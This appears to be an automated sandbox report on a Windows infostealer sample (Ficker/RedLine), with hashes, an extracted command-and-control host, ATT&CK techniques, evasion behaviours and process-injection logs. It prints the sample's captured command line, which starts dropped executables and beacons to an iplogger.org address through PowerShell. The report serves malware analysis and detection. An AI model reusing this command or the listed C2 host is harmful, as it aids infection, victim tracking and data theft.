fickerstealer | 7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed

Analysis

max time kernel
155s
max time network
171s
platform
windows7_x64
resource
win7-en-20211208
submitted
15-02-2022 12:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe
Size

3.0MB
MD5

c0786eaf915a205bb066e598e5418c6b
SHA1

8440f9408fa74c88fad34977ca1ac639c1f5ef2e
SHA256

7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed
SHA512

4ecad942db3dc06da1c6c158e850eb7460bd4e3ba51e6abb304fec81cbd27aff475e9e3df37043de0dbc4f757b03a1588eb13c560a687c8d039a41bc6667c2c4

Score

10^/10

fickerstealer redline evasion infostealer themida trojan

Malware Config

Extracted

Family

fickerstealer

game2030.site:80

Signatures

Fickerstealer
Ficker is an infostealer written in Rust and ASM.
infostealer fickerstealer
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1148-80-0x0000000000BE0000-0x0000000001344000-memory.dmp	family_redline

.NET Reactor proctector 1 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

Processes:

resource	yara_rule
behavioral1/memory/1148-80-0x0000000000BE0000-0x0000000001344000-memory.dmp	net_reactor

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497
Executes dropped EXE 3 IoCs

Processes:

MMP1.exeWw.exeMMP1.exe

pid process

568 MMP1.exe
1148 Ww.exe
992 MMP1.exe

pid	process
568	MMP1.exe
1148	Ww.exe
992	MMP1.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Ww.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Ww.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Ww.exe

Loads dropped DLL 5 IoCs

Processes:

7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.execmd.exeMMP1.exe

pid process

1672 7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe
1408 cmd.exe
1408 cmd.exe
1408 cmd.exe
568 MMP1.exe

pid	process
1672	7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe
1408	cmd.exe
1408	cmd.exe
1408	cmd.exe
568	MMP1.exe

Themida packer 4 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\Ww.exe	themida
C:\Users\Admin\AppData\Local\Temp\Ww.exe	themida
C:\Users\Admin\AppData\Local\Temp\Ww.exe	themida
behavioral1/memory/1148-80-0x0000000000BE0000-0x0000000001344000-memory.dmp	themida

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

Ww.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Ww.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

4 api.ipify.org
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

Ww.exe

pid process

1148 Ww.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

MMP1.exe

description pid process target process

PID 568 set thread context of 992 568 MMP1.exe MMP1.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

Ww.exepowershell.exe

pid process

1148 Ww.exe
1784 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1784 powershell.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Ww.exe

flow	ioc
4	api.ipify.org

pid	process
1148	Ww.exe

description	pid	process	target process
PID 568 set thread context of 992	568	MMP1.exe	MMP1.exe

pid	process
1148	Ww.exe
1784	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1784	powershell.exe

Suspicious use of WriteProcessMemory 36 IoCs

Processes:

7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.execmd.exeMMP1.exe

description	pid	process	target process
PID 1672 wrote to memory of 1408	1672	7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe	cmd.exe
PID 1672 wrote to memory of 1408	1672	7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe	cmd.exe
PID 1672 wrote to memory of 1408	1672	7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe	cmd.exe
PID 1672 wrote to memory of 1408	1672	7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe	cmd.exe
PID 1408 wrote to memory of 568	1408	cmd.exe	MMP1.exe
PID 1408 wrote to memory of 568	1408	cmd.exe	MMP1.exe
PID 1408 wrote to memory of 568	1408	cmd.exe	MMP1.exe
PID 1408 wrote to memory of 568	1408	cmd.exe	MMP1.exe
PID 1408 wrote to memory of 1148	1408	cmd.exe	Ww.exe
PID 1408 wrote to memory of 1148	1408	cmd.exe	Ww.exe
PID 1408 wrote to memory of 1148	1408	cmd.exe	Ww.exe
PID 1408 wrote to memory of 1148	1408	cmd.exe	Ww.exe
PID 1408 wrote to memory of 1784	1408	cmd.exe	powershell.exe
PID 1408 wrote to memory of 1784	1408	cmd.exe	powershell.exe
PID 1408 wrote to memory of 1784	1408	cmd.exe	powershell.exe
PID 1408 wrote to memory of 1784	1408	cmd.exe	powershell.exe
PID 568 wrote to memory of 992	568	MMP1.exe	MMP1.exe
PID 568 wrote to memory of 992	568	MMP1.exe	MMP1.exe
PID 568 wrote to memory of 992	568	MMP1.exe	MMP1.exe
PID 568 wrote to memory of 992	568	MMP1.exe	MMP1.exe
PID 568 wrote to memory of 992	568	MMP1.exe	MMP1.exe
PID 568 wrote to memory of 992	568	MMP1.exe	MMP1.exe
PID 568 wrote to memory of 992	568	MMP1.exe	MMP1.exe
PID 568 wrote to memory of 992	568	MMP1.exe	MMP1.exe
PID 568 wrote to memory of 992	568	MMP1.exe	MMP1.exe
PID 568 wrote to memory of 992	568	MMP1.exe	MMP1.exe
PID 568 wrote to memory of 992	568	MMP1.exe	MMP1.exe
PID 568 wrote to memory of 992	568	MMP1.exe	MMP1.exe
PID 568 wrote to memory of 992	568	MMP1.exe	MMP1.exe
PID 568 wrote to memory of 992	568	MMP1.exe	MMP1.exe
PID 568 wrote to memory of 992	568	MMP1.exe	MMP1.exe
PID 568 wrote to memory of 992	568	MMP1.exe	MMP1.exe
PID 568 wrote to memory of 992	568	MMP1.exe	MMP1.exe
PID 568 wrote to memory of 992	568	MMP1.exe	MMP1.exe
PID 568 wrote to memory of 992	568	MMP1.exe	MMP1.exe
PID 568 wrote to memory of 992	568	MMP1.exe	MMP1.exe

C:\Users\Admin\AppData\Local\Temp\7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe
"C:\Users\Admin\AppData\Local\Temp\7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1672

C:\Windows\SysWOW64\cmd.exe
"cmd" /c start "" "MMP1.exe" & start "" "Ww.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1BHHn7"
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1408

C:\Users\Admin\AppData\Local\Temp\MMP1.exe
"MMP1.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:568

C:\Users\Admin\AppData\Local\Temp\MMP1.exe
"MMP1.exe"
4⤵
- Executes dropped EXE
PID:992

C:\Users\Admin\AppData\Local\Temp\Ww.exe
"Ww.exe"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1148

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1BHHn7"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1784

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\MMP1.exe
MD5
5ca7fa3d1d1efdffada437068eccbd4e

SHA1
0204b4435a79e1d3ce325706801ba3687e86dccf

SHA256
8eb80516c235524eac32db0f1ff1aa1a327ebe6ce1d2ec3f259c9358cda6e80b

SHA512
15ace6e0f384fb4f228faf49942aeced299200807a00829c8530fa1bc0408ee2de8a44a07dd9e823b7f90dd06dbeddda4934ecf4f0083173f8648c3833f8c13d

Download Submit
C:\Users\Admin\AppData\Local\Temp\MMP1.exe
MD5
5ca7fa3d1d1efdffada437068eccbd4e

SHA1
0204b4435a79e1d3ce325706801ba3687e86dccf

SHA256
8eb80516c235524eac32db0f1ff1aa1a327ebe6ce1d2ec3f259c9358cda6e80b

SHA512
15ace6e0f384fb4f228faf49942aeced299200807a00829c8530fa1bc0408ee2de8a44a07dd9e823b7f90dd06dbeddda4934ecf4f0083173f8648c3833f8c13d

Download Submit
C:\Users\Admin\AppData\Local\Temp\MMP1.exe
MD5
5ca7fa3d1d1efdffada437068eccbd4e

SHA1
0204b4435a79e1d3ce325706801ba3687e86dccf

SHA256
8eb80516c235524eac32db0f1ff1aa1a327ebe6ce1d2ec3f259c9358cda6e80b

SHA512
15ace6e0f384fb4f228faf49942aeced299200807a00829c8530fa1bc0408ee2de8a44a07dd9e823b7f90dd06dbeddda4934ecf4f0083173f8648c3833f8c13d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ww.exe
MD5
e58d740f792702828c45ebfb73c8a95d

SHA1
8eeb2a9357aa57affb56cc938342d3dd7bb6f0c9

SHA256
ebc182b1f61f415d16d1a6b43c3250f290633b1a297916911166a078c80ddd10

SHA512
9152981670830fcc732464c4e21dc7d1af9cd6d8856601782a6166a2b81f031a2c6463fc89fdbd760bfb207861725587d80f872785441ab69d108758c9c5a8f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ww.exe
MD5
e58d740f792702828c45ebfb73c8a95d

SHA1
8eeb2a9357aa57affb56cc938342d3dd7bb6f0c9

SHA256
ebc182b1f61f415d16d1a6b43c3250f290633b1a297916911166a078c80ddd10

SHA512
9152981670830fcc732464c4e21dc7d1af9cd6d8856601782a6166a2b81f031a2c6463fc89fdbd760bfb207861725587d80f872785441ab69d108758c9c5a8f8

Download Submit
\Users\Admin\AppData\Local\Temp\MMP1.exe
MD5
5ca7fa3d1d1efdffada437068eccbd4e

SHA1
0204b4435a79e1d3ce325706801ba3687e86dccf

SHA256
8eb80516c235524eac32db0f1ff1aa1a327ebe6ce1d2ec3f259c9358cda6e80b

SHA512
15ace6e0f384fb4f228faf49942aeced299200807a00829c8530fa1bc0408ee2de8a44a07dd9e823b7f90dd06dbeddda4934ecf4f0083173f8648c3833f8c13d

Download Submit
\Users\Admin\AppData\Local\Temp\MMP1.exe
MD5
5ca7fa3d1d1efdffada437068eccbd4e

SHA1
0204b4435a79e1d3ce325706801ba3687e86dccf

SHA256
8eb80516c235524eac32db0f1ff1aa1a327ebe6ce1d2ec3f259c9358cda6e80b

SHA512
15ace6e0f384fb4f228faf49942aeced299200807a00829c8530fa1bc0408ee2de8a44a07dd9e823b7f90dd06dbeddda4934ecf4f0083173f8648c3833f8c13d

Download Submit
\Users\Admin\AppData\Local\Temp\MMP1.exe
MD5
5ca7fa3d1d1efdffada437068eccbd4e

SHA1
0204b4435a79e1d3ce325706801ba3687e86dccf

SHA256
8eb80516c235524eac32db0f1ff1aa1a327ebe6ce1d2ec3f259c9358cda6e80b

SHA512
15ace6e0f384fb4f228faf49942aeced299200807a00829c8530fa1bc0408ee2de8a44a07dd9e823b7f90dd06dbeddda4934ecf4f0083173f8648c3833f8c13d

Download Submit
\Users\Admin\AppData\Local\Temp\Ww.exe
MD5
e58d740f792702828c45ebfb73c8a95d

SHA1
8eeb2a9357aa57affb56cc938342d3dd7bb6f0c9

SHA256
ebc182b1f61f415d16d1a6b43c3250f290633b1a297916911166a078c80ddd10

SHA512
9152981670830fcc732464c4e21dc7d1af9cd6d8856601782a6166a2b81f031a2c6463fc89fdbd760bfb207861725587d80f872785441ab69d108758c9c5a8f8

Download Submit
\Users\Admin\AppData\Local\Temp\nst2A0E.tmp\JHILLSVZFH1MBP.dll
MD5
293165db1e46070410b4209519e67494

SHA1
777b96a4f74b6c34d43a4e7c7e656757d1c97f01

SHA256
49b7477db8dd22f8cf2d41ee2d79ce57797f02e8c7b9e799951a6c710384349a

SHA512
97012139f2da5868fe8731c0b0bcb3cfda29ed10c2e6e2336b504480c9cd9fb8f4728cca23f1e0bd577d75daa542e59f94d1d341f4e8aaeebc7134bf61288c19

Download Submit
memory/568-75-0x000000000245B000-0x0000000002483000-memory.dmp

Filesize
160KB

Download
memory/568-71-0x000000000245B000-0x0000000002483000-memory.dmp

Filesize
160KB

Download
memory/568-76-0x00000000002B0000-0x00000000002F7000-memory.dmp

Filesize
284KB

Download
memory/992-73-0x0000000000400000-0x000000000044F000-memory.dmp

Filesize
316KB

Download
memory/992-77-0x0000000000400000-0x000000000044F000-memory.dmp

Filesize
316KB

Download
memory/1148-67-0x0000000077061000-0x0000000077062000-memory.dmp

Filesize
4KB

Download
memory/1148-66-0x000000007738E000-0x000000007738F000-memory.dmp

Filesize
4KB

Download
memory/1148-65-0x0000000077064000-0x0000000077065000-memory.dmp

Filesize
4KB

Download
memory/1148-70-0x0000000077820000-0x0000000077822000-memory.dmp

Filesize
8KB

Download
memory/1148-79-0x00000000740CE000-0x00000000740CF000-memory.dmp

Filesize
4KB

Download
memory/1148-80-0x0000000000BE0000-0x0000000001344000-memory.dmp

Filesize
7.4MB

Download
memory/1148-86-0x00000000054B0000-0x00000000054B1000-memory.dmp

Filesize
4KB

Download
memory/1672-55-0x0000000075321000-0x0000000075323000-memory.dmp

Filesize
8KB

Download
memory/1784-81-0x0000000072081000-0x0000000072082000-memory.dmp

Filesize
4KB

Download
memory/1784-82-0x0000000002650000-0x0000000002651000-memory.dmp

Filesize
4KB

Download
memory/1784-83-0x0000000072082000-0x0000000072084000-memory.dmp

Filesize
8KB

Download
memory/1784-84-0x0000000002651000-0x0000000002652000-memory.dmp

Filesize
4KB

Download
memory/1784-85-0x0000000002652000-0x0000000002654000-memory.dmp

Filesize
8KB

Download